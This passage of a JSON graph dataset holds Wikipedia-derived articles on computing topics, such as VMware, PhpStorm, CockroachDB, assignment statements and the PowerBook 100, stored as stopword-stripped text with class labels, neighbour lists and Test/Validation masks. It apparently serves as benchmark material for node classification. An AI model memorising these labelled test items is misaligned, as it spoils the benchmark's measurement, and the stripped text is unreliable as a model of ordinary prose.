since company founding ten years earlier september 10 2008 mendel rosenblum company co-founder chief scientist husband diane greene resigned september 16 2008 vmware announced collaboration cisco systems one result cisco nexus 1000v distributed virtual software switch integrated option vmware infrastructure april 2011 emc transferred control mozy backup service vmware april 12 2011 vmware released open-source platform-as-a-service system called cloud foundry well hosted version service supported application deployment java ruby rails sinatra node.js scala well database support mysql mongodb redis postgres rabbitmq march 2013 vmware announced corporate spin-off pivotal software general electric making investment company vmware application- developer-oriented products including spring tc server cloud foundry rabbitmq gemfire sqlfire transferred organization may 2013 vmware launched iaas service vcloud hybrid service new palo alto headquarters vcloud hybrid service rebranded vcloud air subsequently sold cloud provider ovh announcing early access program las vegas data center service designed function extension customer existing vsphere installations full compatibility existing virtual machines virtualized vmware software tightly integrated networking service based vcloud director 5.1/vsphere 5.1 september 2013 vmworld san francisco vmware announced general availability vcloud hybrid service expansion sterling virginia santa clara california dallas texas service beta uk announced acquisition desktone october 2013 january 2016 anticipation dell acquisition emc vmware announced restructuring reduce 800 positions executives resigned entire development team behind vmware workstation fusion disbanded us developers immediately fired april 24 2016 maintenance release 12.1.1 released september 8 2016 vmware announced release workstation 12.5 fusion 8.5 free upgrade supporting windows 10 windows server 2016 april 2016 vmware president coo carl eschenbach left vmware join sequoia capital martin casado vmware general manager networking security business left join andreessen horowitz analysts commented cultures dell emc emc vmware different said heard impending corporate cultural collisions potentially radical product overlap pruning would cause many emc vmware personnel leave vmware ceo pat gelsinger following rumours categorically denied would leave august 2016 vmware introduced vmware cloud provider website new branch role funneling cloud related information central source cloud provider technology content thanks “ services first ” approach cloud providers find differentiated monetizable services deliver leveraging vmware ’ platform latest case studies demos blogs architecture toolkits vmware available one place mozy transferred dell 2016 merger dell emc april 2017 according glassdoor vmware ranked 3rd list highest paying companies united states q2 2017 vmware sold vcloud air french cloud service provider ovh march 2015 software freedom conservancy announced funding litigation christoph hellwig hamburg germany vmware alleged violation copyrights esxi product sfc claimed vmware using linux kernel busybox without respecting terms gpl copyright license vmware told journalists believed case without merit expressed disappointment conservancy resorted litigation lawsuit dismissed court july 2016 hellwig announced would file appeal appeal decided february 2019 dismissed german court basis meeting procedural requirements burden proof plaintiff vmware notable products hypervisors vmware became well known first type 2 hypervisor known gsx product since evolved two hypervisor products lines vmware type 1 hypervisors running directly hardware hosted type 2 hypervisors vmware software provides completely virtualized set hardware guest operating system vmware software virtualizes hardware video adapter network adapter hard disk adapters host provides pass-through drivers guest usb serial parallel devices way vmware virtual machines become highly portable computers every host looks nearly identical guest practice system administrator pause operations virtual machine guest move copy guest another physical computer resume execution exactly point suspension alternatively enterprise servers feature called vmotion allows migration operational guest virtual machines similar separate hardware hosts sharing storage vmotion storage separate storage used transitions completely transparent users virtual machine time migrated vmware workstation server esx take optimized path running target operating systems host emulators bochs simulate function cpu instruction target machine one-by-one dynamic recompilation compiles blocks machine-instructions first time execute uses translated code directly code runs subsequently microsoft virtual pc macos takes approach vmware software emulate instruction set different hardware physically present significantly boosts performance cause problems moving virtual machine guests hardware hosts using different instruction sets found 64-bit intel amd cpus hardware hosts differing number cpus software cpu agnostic usually survive transition unless agnostic forking startup case software guest os must stopped moving restarted move vmware products predate virtualization extensions x86 instruction set require virtualization-enabled processors newer processors hypervisor designed take advantage extensions however unlike many hypervisors vmware still supports older processors cases uses cpu run code directly whenever possible example running user-mode virtual 8086 mode code x86 direct execution operate kernel-level real-mode code vmware products use binary translation bt re-write code dynamically translated code gets stored spare memory typically end address space segmentation mechanisms protect make invisible reasons vmware operates dramatically faster emulators running 80 speed virtual guest operating system would run directly hardware one study vmware claims slowdown native ranging 0–6 percent vmware esx server vmware approach avoids difficulties virtualization x86-based platforms virtual machines may deal offending instructions replacing simply running kernel code user mode replacing instructions runs risk code may fail find expected content reads one protect code reading allowing normal execution replacing place becomes complicated running code unmodified user mode also fail instructions read machine state cause exception betray real state program certain instructions silently change behavior user mode one must always rewrite performing simulation current program counter original location necessary notably remapping hardware code breakpoints although vmware virtual machines run user mode vmware workstation requires installation various device drivers host operating system notably dynamically switch global descriptor table gdt interrupt descriptor table idt vmware product line also run different operating systems dual-boot system simultaneously booting one partition natively using guest within vmware workstation vmware esxi enterprise software product deliver greater performance freeware vmware server due lower system computational overhead vmware esxi bare-metal product runs directly server hardware allowing virtual servers also use hardware less directly addition vmware esxi integrates vmware vcenter offers extra services vmware workspace portal self-service app store workspace management vmware storage availability products composed two primary offerings vmware nsx vmware network virtualization product marketed using term software-defined data center sddc technology included acquired 2012 purchase nicira workspace one allows mobile users access apps data vix virtual infrastructure extension api allows automated scripted management computer virtualized using either vmware vsphere workstation player fusion products vix provides bindings programming languages c perl visual basic vbscript c",
    "neighbors": [
      9218,
      8201,
      9739,
      4112,
      18,
      1560,
      10782,
      10788,
      5677,
      6703,
      54,
      5174,
      5689,
      2107,
      10302,
      3654,
      6730,
      10827,
      1102,
      10322,
      4695,
      5210,
      4699,
      10843,
      94,
      5217,
      4194,
      1638,
      2154,
      9844,
      3705,
      9337,
      127,
      4235,
      6797,
      3214,
      11410,
      9365,
      4761,
      2717,
      11423,
      2723,
      5293,
      6834,
      7347,
      9906,
      7354,
      6852,
      10951,
      5832,
      3791,
      724,
      8410,
      10971,
      3294,
      3304,
      9449,
      5356,
      8438,
      8439,
      9974,
      3323,
      8445,
      7937,
      5378,
      7941,
      6924,
      5393,
      11542,
      5918,
      10016,
      5924,
      6445,
      7983,
      823,
      318,
      4929,
      8515,
      1350,
      4424,
      1870,
      6481,
      1362,
      6993,
      7507,
      11605,
      9048,
      9562,
      2395,
      8539,
      862,
      11103,
      9569,
      11108,
      11626,
      3950,
      5486,
      7022,
      9585,
      4982,
      10615,
      1400,
      3962,
      8571,
      11644,
      8061,
      2430,
      5504,
      6018,
      6532,
      1415,
      1927,
      10120,
      394,
      7563,
      11146,
      911,
      2965,
      3989,
      4505,
      9625,
      928,
      10153,
      5034,
      4011,
      5049,
      6074,
      8136,
      7628,
      7117,
      9166,
      9682,
      2515,
      982,
      7126,
      5080,
      3545,
      6619,
      5598,
      11233,
      11235,
      1513,
      7660,
      9202,
      499,
      2036,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 6154,
    "label": 9,
    "text": "PhpStorm:phpstorm jetbrains phpstorm commercial cross-platform ide integrated development environment php built jetbrains intellij idea platform phpstorm provides editor php html javascript on-the-fly code analysis error prevention automated refactorings php javascript code phpstorm code completion supports php 5.3 5.4 5.5 5.6 7.0 7.1 7.2 modern legacy projects including generators coroutines finally keyword list foreach namespaces closures traits short array syntax includes full-fledged sql editor editable query results phpstorm built intellij idea written java users extend ide installing plugins created intellij platform write plugins features available webstorm included phpstorm adds support php databases webstorm ships pre-installed javascript plugins node.js ultimate edition jetbrains polyglot ide intellij idea supports functionality phpstorm plugins november 2015 jetbrains switched licensing phpstorm subscription basis annual subscriptions monthly subscriptions maintained 12 consecutive months also receive perpetual fallback license major version available time purchase phpstorm available individual developers business organizations additional discounted complementary licenses available startups students teachers non-commercial open source projects complementary licenses require approval include perpetual fallback clause i.e expire",
    "neighbors": [
      1034,
      9738,
      5663,
      6176,
      5677,
      4171,
      6231,
      11357,
      8289,
      10341,
      7785,
      5747,
      7293,
      1668,
      6791,
      6797,
      8854,
      10910,
      1698,
      10413,
      7346,
      1203,
      7355,
      190,
      5311,
      7871,
      6338,
      7364,
      5833,
      8923,
      10478,
      10991,
      11503,
      4853,
      6910,
      1802,
      4885,
      2338,
      2348,
      303,
      7983,
      823,
      4919,
      4920,
      7486,
      2372,
      1353,
      8524,
      847,
      339,
      9560,
      9561,
      10587,
      2910,
      8554,
      8068,
      3462,
      9614,
      8605,
      2465,
      5031,
      438,
      9661,
      1470,
      8644,
      5067,
      11221,
      4056,
      3553,
      482,
      9701,
      7658,
      7147,
      9195,
      5101,
      10739,
      10744,
      11259,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6155,
    "label": 2,
    "text": "MS/8:ms/8 ms/8 rl monitor system discontinued operating system developed digital equipment corporation pdp-8 1966 richard f. lary submitted decus 1970 disk oriented system faster predecessor 4k disk monitor system tricks make run quickly dectape based systems ms/8 since replaced p s/8 cos-310",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      8732,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      8876,
      7983,
      3248,
      6448,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6156,
    "label": 1,
    "text": "Cockroach_Labs:cockroach labs cockroach labs computer software company develops commercial database management systems best known cockroachdb compared google spanner cockroachdb project designed store copies data multiple locations order deliver speed access described scalable consistently-replicated transactional datastore cockroach labs founded 2015 ex-google employees spencer kimball peter mattis ben darnell prior cockroach labs kimball mattis key members google file system team darnell key member google reader team google three previously used bigtable acquainted successor spanner leaving google wanted design build something similar companies outside google june 2015 company nine cockroachdb engineers spencer kimball wrote first iteration design january 2014 began open-source project github february 2014 allowing outside access contributions attracted community experienced contributors co-founders actively supporting project conferences networking meet-ups collaborations github earned open source rookie year title awarded black duck software open-source projects june 2015 company closed 6.25 million funding benchmark sequoia google ventures firstmark capital benchmark general partner peter fenton named company board directors additional investors included hortonworks chief executive rob bearden coreos ceo alex polvi cloudera co-founder jeff hammerbacher june 2019 cockroach labs announced cockroachdb would change license free software license apache license 2.0 proprietary license cockroach labs raised 55 million series c round august 2019 led altimeter capital database scalable single instance scale single laptop thousands servers cockroachdb designed run cloud resilient failures result database described almost impossible take even multiple servers entire datacenter go offline cockroachdb would keep services online",
    "neighbors": [
      9344,
      7841,
      7816,
      5034,
      3795,
      5332,
      10389,
      11221,
      7802
    ],
    "mask": "Test"
  },
  {
    "node_id": 6157,
    "label": 2,
    "text": "Wallace_v._International_Business_Machines_Corp.:wallace v. international business machines corp. wallace v. international business machines corp. 467 f.3d 1104 7th cir 2006 significant case development free software case decided court appeals seventh circuit united states law gnu general public license gpl contravene federal antitrust laws daniel wallace united states citizen sued free software foundation fsf price fixing later lawsuit unsuccessfully sued ibm novell red hat wallace claimed free linux prevented making profit selling operating system 2005 daniel wallace filed suit fsf u.s. district court southern district indiana stating gpl requiring copies computer software licensed made available freely possibly even cost tantamount price fixing november 2005 case dismissed without prejudice wallace filed multiple amended complaints effort satisfy requirements antitrust allegation fourth final amended complaint dismissed march 20 2006 judge john daniel tinder wallace ordered pay fsf costs decision grant motion dismiss court ruled wallace failed allege antitrust injury claim could based since wallace obligated claim injured also market court instead found court also noted prior cases established sherman act enacted assure customers benefits price competition emphasized act primary purpose protecting economic freedom participants relevant market decision thus supports right authors content creators offer creations free charge 2006 daniel wallace filed lawsuit software companies ibm novell red hat profit distribution open-source software specifically gnu/linux operating system wallace allegation software companies engaging anticompetitive price fixing may 16 2006 judge richard l. young dismissed case prejudice wallace later filed appeal seventh circuit appeal court case heard de novo front three-judge panel led frank easterbrook lost appeal judge citing number problems complaint",
    "neighbors": [
      6311,
      5450,
      8792,
      6157,
      5006,
      7983,
      9455,
      10040,
      9397,
      823,
      3960,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 6158,
    "label": 2,
    "text": "Macpup:macpup macpup operating system based puppy linux puppy normal jwm window manager available also includes enlightenment wm users quickly switch window managers without rebooting macpup enlightenment interface installed features mac os x-like dockbar many enlightenment themes available macpup comes firefox web browser like parent macpup run ram live .iso uses 184mb ram",
    "neighbors": [
      5067,
      5356,
      9964,
      499,
      5363,
      5397,
      5078,
      823,
      6393,
      7483
    ],
    "mask": "Test"
  },
  {
    "node_id": 6159,
    "label": 4,
    "text": "Dynamic_secrets:dynamic secrets dynamic secrets novel key management scheme secure communications proposed sheng xiao weibo gong towsley first academic publication nominated infocom 2010 best paper award later monograph published springer extend scheme framework dynamic secrets applied bi-directional communication systems single-directional communication systems improve communication security three main benefits 1. encryption authentication keys rapidly automatically updated pair communication devices 2. key update process binds communication process incurs negligible computing bandwidth cost 3 use cloned key either authentication encrypted communication guaranteed detected detection false alarms cost computing networking resources dynamic secrets automatically break secure communication clone key legitimate key co-exist however order find attacker takes actions consumes computing power network bandwidth",
    "neighbors": [
      5433,
      939,
      2932,
      3629
    ],
    "mask": "Test"
  },
  {
    "node_id": 6160,
    "label": 9,
    "text": "Assignment_(computer_science):assignment computer science computer programming assignment statement sets and/or re-sets value stored storage location denoted variable name words copies value variable imperative programming languages assignment statement expression fundamental construct today commonly used notation basic operation come codice_1 originally superplan 1949–51 popularized fortran 1957 c followed codice_2 originally algol 1958 popularised pascal although many notations use languages symbol used regarded operator meaning assignment statement whole returns value others define assignment statement meaning used expression assignments typically allow variable hold different values different times life-span scope however languages primarily strictly functional allow kind destructive reassignment might imply changes non-local state purpose enforce referential transparency i.e functions depend state variable produce results given set parametric inputs point time modern programs languages also often use similar strategies although less strict certain parts order reduce complexity normally conjunction complementing methodologies data structuring structured programming object orientation assignment operation process imperative programming different values associated particular variable name time passes program model operates changing state using successive assignment statements primitives imperative programming languages rely assignment iteration lowest level assignment implemented using machine operations codice_3 codice_4 variables containers values possible put value variable later replace new one assignment operation modifies current state executing program consequently assignment dependent concept variables assignment example assuming codice_7 numeric variable assignment codice_8 means content variable codice_7 doubled execution statement example segment c code sample variable codice_10 first declared int assigned value 10 notice declaration assignment occur statement second line codice_11 declared without assignment third line codice_10 reassigned value 23 finally codice_11 assigned value 32.4 assignment operation necessary value codice_5 well-defined valid rvalue codice_6 represents modifiable entity valid modifiable non-const lvalue languages typically dynamic ones necessary declare variable prior assigning value languages variable automatically declared first time assigned scope declared varying language assignment changes existing value e.g codice_16 disallowed purely functional languages functional programming assignment discouraged favor single assignment also called initialization single assignment example name binding differs assignment described article done usually variable created subsequent reassignment allowed evaluation expression side effect change observable state machine produces values input imperative assignment introduce side effects destroying making old value unavailable substituting new one referred destructive assignment reason lisp functional programming similar destructive updating single assignment form assignment available purely functional languages haskell variables sense imperative programming languages rather named constant values possibly compound nature elements progressively defined on-demand purely functional languages provide opportunity computation performed parallel avoiding von neumann bottleneck sequential one step time execution since values independent impure functional languages provide single assignment well true assignment though true assignment typically used less frequency imperative programming languages example scheme single assignment codice_17 true assignment codice_18 used variables specialized primitives provided destructive update inside lists vectors strings etc ocaml single assignment allowed variables via codice_19 syntax however destructive update used elements arrays strings separate codice_20 operator well fields records objects explicitly declared mutable meaning capable changed initial declaration programmer functional programming languages use single assignment include clojure data structures vars erlang accepts multiple assignment values equal contrast haskell f haskell lava ocaml oz dataflow variables cells racket data structures like lists symbols sasl scala vals sisal standard ml non-backtracking prolog code considered explicit single-assignment explicit sense named variables explicitly unassigned state set exactly haskell contrast unassigned variables every variable thought implicitly set value rather computational object produce value demand created programming languages assignment statement returns value others expression-oriented programming languages example c assignment statement returns assigned value allowing idioms codice_21 assignment statement codice_22 returns value codice_7 assigned codice_10 statement codice_25 return value function used control loop assigning value variable programming languages scheme example return value assignment undefined idioms invalid haskell variable assignment operations similar assignment like assigning field array field mutable data structure usually evaluate unit type represented codice_26 type one possible value therefore containing information typically type expression evaluated purely side effects certain use patterns common thus often special syntax support primarily syntactic sugar reduce redundancy source code also assists readers code understanding programmer intent provides compiler clue possible optimization case assigned value depends previous one common many imperative languages notably c majority descendants provide special operators called augmented assignment like codice_27 codice_28 instead written codice_29 beyond syntactic sugar assists task compiler making clear in-place modification variable codice_7 possible statement like codice_31 called chained assignment value codice_32 assigned multiple variables codice_33 codice_11 chained assignments often used initialize multiple variables codice_35 programming languages support chained assignment chained assignments equivalent sequence assignments evaluation strategy differs languages simple chained assignments like initializing multiple variables evaluation strategy matter targets l-values assignment connected way evaluation strategy affects result programming languages c example chained assignments supported assignments expressions values case chain assignment implemented right-associative assignment assignments happen right-to-left example codice_36 equivalent codice_37 c++ also available values class types declaring appropriate return type assignment operator python assignment statements expressions thus value instead chained assignments series statements multiple targets single expression assignments executed left-to-right codice_36 evaluates expression codice_39 assigns result leftmost target codice_40 assigns result next target codice_41 using new value codice_40 essentially equivalent codice_43 though actual variable produced temporary value programming languages apl common lisp go javascript since 1.7 php maple lua occam 2 perl python rebol ruby windows powershell allow several variables assigned parallel syntax like simultaneously assigns 0 codice_7 1 codice_45 often known parallel assignment introduced cpl 1963 name simultaneous assignment sometimes called multiple assignment though confusing used single assignment opposites right-hand side assignment single variable e.g array structure feature called unpacking destructuring assignment list unpacked 0 assigned codice_7 1 codice_45 furthermore swaps values codice_7 codice_45 languages without parallel assignment would written use temporary variable since codice_50 leaves codice_7 codice_45 original value codice_45 languages go python combine parallel assignment tuples automatic allow multiple return values single function python example provides alternative use output parameters returning multiple values function dates clu 1974 clu helped popularize parallel assignment generally c c++ comma operator similar parallel assignment allowing multiple assignments occur within single statement writing codice_54 instead codice_55 primarily used loops replaced parallel assignment languages go however c++ code ensure perfect simultaneity since right side following code codice_56 evaluated left side languages python codice_57 assign two variables concurrently using initial value compute new b use equals sign codice_58 assignment operator frequently criticized due conflict equals comparison equality results confusion novices writing code confusion even experienced programmers reading code use equals assignment dates back heinz rutishauser language superplan designed 1949 1951 particularly popularized fortran beginning programmers sometimes confuse assignment relational operator equality means equality mathematics used assignment many languages assignment alters value variable equality testing tests whether two expressions value languages basic single equals sign codice_59 used assignment operator equality relational operator context determining meant languages use different symbols two operators example similarity two symbols lead errors programmer forgets form codice_58 codice_67 codice_68 appropriate mistypes codice_58 codice_67 intended common programming problem languages c including one famous attempt backdoor linux kernel assignment operator also returns value assigned way function returns value validly nested inside expressions intention compare two values codice_71 statement instance assignment quite likely return value interpretable boolean true case codice_72 clause executed leading program behave unexpectedly language processors gcc detect situations warn programmer potential error two common representations copying assignment equals sign codice_58 colon-equals codice_68 forms may semantically denote either assignment statement assignment operator also value depending language and/or usage possibilities include left arrow keyword though rarer variants mathematical pseudo code assignments generally depicted left-arrow platforms put expression left variable right expression-oriented languages lisp tcl uniformly use prefix postfix syntax statements including assignment",
    "neighbors": [
      512,
      2062,
      9245,
      8225,
      5677,
      1591,
      2617,
      3642,
      8262,
      1613,
      7259,
      7775,
      8289,
      2666,
      2670,
      623,
      8822,
      6775,
      3705,
      5760,
      9345,
      1672,
      655,
      5783,
      3736,
      4777,
      6313,
      9385,
      5806,
      692,
      3765,
      3767,
      9915,
      8382,
      8385,
      10435,
      5833,
      8397,
      7894,
      7386,
      8421,
      4840,
      9454,
      240,
      3336,
      6414,
      10510,
      10011,
      797,
      3876,
      1830,
      9008,
      8502,
      7479,
      5946,
      10043,
      10555,
      3904,
      1349,
      11589,
      10568,
      5961,
      10571,
      8524,
      9047,
      5466,
      10586,
      10083,
      6502,
      8554,
      3960,
      10617,
      380,
      3462,
      8582,
      1931,
      5521,
      8082,
      11674,
      1435,
      5031,
      428,
      10668,
      7612,
      10684,
      963,
      8644,
      11212,
      11219,
      5588,
      10198,
      2519,
      4057,
      477,
      4069,
      3051,
      6640,
      1016,
      3577,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6161,
    "label": 7,
    "text": "Gremlin_(programming_language):gremlin programming language gremlin graph traversal language virtual machine developed apache tinkerpop apache software foundation gremlin works oltp-based graph databases well olap-based graph processors gremlin automata functional language foundation enable gremlin naturally support imperative declarative querying host language agnosticism user-defined domain specific languages extensible compiler/optimizer single- multi-machine execution models hybrid depth- breadth-first evaluation well turing completeness explanatory analogy apache tinkerpop gremlin graph databases jdbc sql relational databases likewise gremlin traversal machine graph computing java virtual machine general purpose computing gremlin apache2-licensed graph traversal language used graph system vendors typically two types graph system vendors oltp graph databases olap graph processors table outlines graph vendors support gremlin following examples gremlin queries responses gremlin-groovy environment relative graph representation movielens dataset dataset includes users rate movies users one occupation movie one categories associated movielens graph schema detailed gremlin supports declarative graph pattern matching similar sparql instance following query uses gremlin match -step gremlin virtual machine composed instruction set well execution engine analogy drawn gremlin java following traversal gremlin traversal gremlin-java8 dialect gremlin language i.e fluent-style expressing graph traversal represented host language supports function composition function nesting due simple requirement exists various gremlin dialects including gremlin-groovy gremlin-scala gremlin-clojure etc gremlin-java8 traversal ultimately compiled step sequence called traversal string representation traversal provided steps primitives gremlin graph traversal machine parameterized instructions machine ultimately executes gremlin instruction set approximately 30 steps steps sufficient provide general purpose computing typically required express common motifs graph traversal query given gremlin language instruction set virtual machine possible design another traversal language compiles gremlin traversal machine analogous scala compiles jvm instance popular sparql graph pattern match language compiled execute gremlin machine following sparql query would compile gremlin-java8 sparql query would represented compile identical gremlin step sequence i.e traversal gremlin graph traversal machine execute single machine across multi-machine compute cluster execution agnosticism allows gremlin run graph databases oltp graph processors olap",
    "neighbors": [
      5632,
      8451,
      10377,
      7567,
      1296,
      1047,
      151,
      1913,
      1306,
      6555,
      2972,
      8217,
      8860,
      9631,
      11161,
      3877,
      10661,
      5031,
      11303,
      5677,
      10413,
      7983,
      7159,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      8262,
      9290,
      9926,
      4944,
      1363,
      8788,
      8408,
      987,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      6629,
      11111,
      8425,
      8810,
      747,
      5612,
      5872,
      2163,
      6775,
      3705,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 6162,
    "label": 4,
    "text": "Computer_security_policy:computer security policy computer security policy defines goals elements organization computer systems definition highly formal informal security policies enforced organizational policies security mechanisms technical implementation defines whether computer system secure insecure formal policy models categorized core security principles confidentiality integrity availability example bell-la padula model confidentiality policy model whereas biba model integrity policy model system regarded finite-state automaton set transitions operations change system state security policy seen statement partitions states authorized unauthorized ones given simple definition one define secure system one starts authorized state never enter unauthorized state represent concrete policy especially automated enforcement language representation needed exist lot application specific languages closely coupled security mechanisms enforce policy application compared abstract policy languages e.g domain type enforcement-language independent concrete mechanism",
    "neighbors": [
      3616,
      3969,
      8259,
      8998,
      4583,
      1961,
      4554,
      10968,
      1364,
      1013,
      3924,
      6360,
      3417
    ],
    "mask": "Test"
  },
  {
    "node_id": 6163,
    "label": 9,
    "text": "FX-87:fx-87 fx-87 polymorphic typed functional language based system static program analysis every expression two static properties type effect study done mit fx-87 yields similar performance results functional languages programs contain side effects fibonacci factorial fx-87 yield great performance increase matching dna sequences kfx kernel language fx-87 described 'polymorphic effect systems j.m lucassen et al. proceedings 15th annual acm conference popl acm 1988 pp 47–57",
    "neighbors": [
      10571,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 6164,
    "label": 4,
    "text": "Francis_Raven:francis raven francis raven april 26 1914 december 1983 american cryptologist early employee national security agency helped crack many codes assist united states world war ii also helped nsa training program creating two cryptology courses graduated yale university 1934 joined united states navy reserve officer assigned naval security group commission reactivated 1940 rejoined nsg working japanese problems agnes driscoll brief period working german ciphers returned japanese issues part group systematically solved many low level codes starting 1942 important source cribs used working jn-25 fleet code also worked jade coral machines successfully cracked war stayed civilian employee nsg joining armed forces security agency 1946 moving nsa formation 1952 1956 held series executive posts within agency culminating appointment chief office nsa training program played major part development two cryptology courses efforts several civilian awards retirement established firm genealogical research active death 1983",
    "neighbors": [
      6755,
      9156,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 6165,
    "label": 3,
    "text": "PowerBook_100:powerbook 100 powerbook 100 portable subnotebook personal computer designed manufactured sony apple computer introduced october 21 1991 comdex computer expo las vegas nevada priced us 2,300 powerbook 100 low-end model first three simultaneously released powerbooks cpu overall speed closely resembled predecessor macintosh portable motorola 68000 16-megahertz mhz processor 2-8 megabytes mb memory monochrome backlit liquid crystal display lcd 640 × 400 pixel resolution system 7.0.1 operating system built-in floppy disk drive noted unique compact design placed trackball pointing device front keyboard ease use apple then-chief executive officer ceo john sculley started powerbook project 1990 allocating 1 million marketing despite small marketing budget new powerbook line success generating 1 billion revenue apple first year sony designed manufactured powerbook 100 collaboration apple industrial design group apple internal design team discontinued september 3 1992 superseded powerbook 145 powerbook duo series since praised several times design pc world named powerbook 100 tenth-greatest pc time 2006 us magazine mobile pc chose powerbook 100 greatest gadget time 2005 1990 john sculley ceo apple oversaw product development personally ensure apple released new computers market quickly new strategy increase market share lowering prices releasing hit products strategy contributed commercial success low-end macintosh classic macintosh lc desktop computers released apple 1990 sculley wanted replicate success products apple new powerbook line sculley began project 1990 wanted powerbook released within one year project three managers john medica managed engineering new laptop randy battat vice president product marketing neil selvin headed marketing effort 1991 two leaders laptop computer industry toshiba compaq introduced models weighing less medica battat selvin deliberately designed powerbook weigh less competitors sculley allocated 1 million marketing budget powerbook product line contrast 25 million used market macintosh classic medica battat selvin used money produce air television commercial viewers would remember advertising agency chiat/day filmed retired los angeles lakers basketball star kareem abdul-jabbar sitting uncomfortably small airline coach seat yet typing comfortably powerbook ad caption read least hands comfortable apple unveiled powerbook 100 october 21 1991 comdex computer expo las vegas alongside two models powerbook 140 powerbook 170 advertisement product successful apple projected us sales 200,000 powerbooks first year peak demand first three months release january 1992 apple sold 100,000 powerbooks time short supply apple soon solved supply problems proceeds powerbook sales reached 1 billion first year launch apple surpassed toshiba compaq market leader worldwide share portable computer shipments powerbook 100 140 170 contributed greatly apple financial success 1992 end financial year apple announced highest figures yet 7.1 billion revenues increase global market share 8 8.5 highest four years however initial popularity powerbook 100 last sales decreased december 1991 140 170 models become popular customers willing pay built-in floppy disk drive second serial port powerbook 100 lacked august 10 1992 apple quietly dropped powerbook 100 price list continued sell existing stock dealers alternative discount consumer-oriented stores price club stores 4mb ram/40mb hard drive configuration floppy drive sold less 1,000 1,500 less similar 2mb/20mb configuration original list price september 17 1992 apple recalled 60,000 powerbook 100s potential safety problem electrical short discovered could melt small hole casing occurred three 60,000 notebooks manufactured october 1991 march 1992 day recall apple shares closed 47 1.25 analysts discounted recall importance addition original power supplies problems insulation cracks could cause short fuse motherboard computer prone cracks power adapter socket motherboard required 400 replacement motherboard warranty expired powerbook 100 internal components based predecessor macintosh portable included motorola 68hc000 16 mhz processor 2 mb memory floppy disk drive cost approximately 2,300 external floppy disk drive available 279 dimensions powerbook 100 improvement portable deep wide high compared portable deep wide high another significant difference less expensive passive matrix display used instead sharper active matrix used portable 170 powerbook 100 included system 7.0.1 operating system standard support versions system 7.5.5 apple however released system 6.0.8l allowed powerbook 100 run system 6 could also used earlier system 6 versions although apple officially support powerbook 100 one external serial port designed use printer compatible rs-422 device first macintosh omit external modem port instead offering optional built-in 2400 baud modem communications result first time user could print directly access appletalk faster external modem simultaneously devices advanced midi interfaces could used required dedicated use ports third-party serial modem port could however installed internal modem slot consumers needed traditional functions computer use contents memory preserved long main lead-acid battery remained charged powerbook 100 power manager integrated circuit usually placed logic board powerbook responsible power management computer identical macintosh portable controlled display backlight hard drive spin-down sleep wake battery charging trackball control input/output i/o 100 add new feature 3.5 v batteries backed permanent expansion random access memory ram powerbook 100 battery replaced 100 otherwise temporarily removed power sources made perfect candidate use apple ram disk help increase battery life accessing hard disk less frequently since 100 powerbook maintained contents ram shutdown order reduce startup time powerbook 100 first powerbook incorporate scsi disk mode allowed used external hard disk desktop macintosh provided convenient method software installed onto powerbook transferred desktop without need 100 optional floppy disk drive specialized scsi cable unique connector required however use scsi device powerbook series second dedicated cable required scsi disk mode feature unique 100 apple introduced new powerbooks year later two versions powerbook 100 qwerty layout keyboard domestic us version 63 keys international iso version 64 keys caps lock key powerbook 100 locking position lighted indicator status compensate system 7 operating system software includes extension file causes icon international caps lock symbol ⇪ appear upper right-hand corner menu bar caps lock active internals powerbook 100 basis apple wizzy active lifestyle telephone prototype powerbook 140 170 designed 100 apple industrial design group march 1990-february 1991 100 styling based computers represents first improvements powerbook line apple benefited lessons learned developing powerful models enclosure 100 designed september december 1990 retained design elements variation snow white design language apple using since 1984 specifically raised ridges spaced apart intended tie existing product line apple approached sony late 1989 enough engineers handle number new products planned delivery 1991 using basic blueprint apple including list chips components portable architecture 100 miniaturized manufactured sony san diego california japan sony engineers little experience building personal computers nonetheless completed apple smallest lightest machine 13 months cancelling projects giving powerbook 100 top priority sony president norio ohga gave project manager kihey yamamoto permission recruit engineers sony division robert brunner apple head industrial design time led design team developed laptop including trackball granite color brunner said designed powerbook would easy use carry regular book dark granite grey color set apart notebook computers time also apple products traditionally beige platinum grey trackball another new design element placed middle computer allowing powerbook easily operated left- right-handed users designers trying create fashion statement overall design laptop felt made personal accessory like wallet briefcase brunner said says something identity person carrying crystal waters home office computing praised powerbook 100 unique effective design disappointed internal modem receive faxes 100 monitor port low-capacity 20 mb hard drive also criticized user core applications installed little room left optional programs documents waters concluded used 100 constantly past weeks know would n't feel cheated buying 40mb hard-disk drive option pc week benchmarked powerbook 100 measuring predecessor macintosh portable powerbook 100 took 5.3 seconds open microsoft word document 2.5 seconds save portable took 5.4 2.6 seconds respectively pc week tested battery life delivered 3 hours 47 minutes use byte magazine review concluded powerbook 100 recommended word processing communications tasks higher-end products offer enough power complex reports large spreadsheets professional graphics macweek described ideal writers others tight budget powerbook 100 continues receive recognition press pc world named powerbook 100 10th-greatest pc time 2006 2005 us magazine mobile pc chose powerbook 100 greatest gadget time ahead sony walkman atari 2600 powerbook 100 received multiple awards design including 1999 idsa silver design decade award form magazine 1993 designer design awards 1992 isda gold industrial design excellence award 1992 appliance manufacturer excellence design award industry forum design 10 best hannover fair award",
    "neighbors": [
      7697,
      4114,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
